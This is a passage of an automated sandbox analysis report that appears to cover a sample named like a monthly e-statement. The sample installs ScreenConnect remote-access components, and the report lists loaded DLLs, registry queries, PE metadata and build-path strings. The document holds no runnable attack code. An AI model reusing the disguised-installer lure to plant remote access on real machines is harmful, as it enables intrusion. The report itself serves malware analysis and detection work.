                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: certificate valid
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2445494046.00000000027A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3289162550.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3288573826.00000000012B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2441384367.00000000009BD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
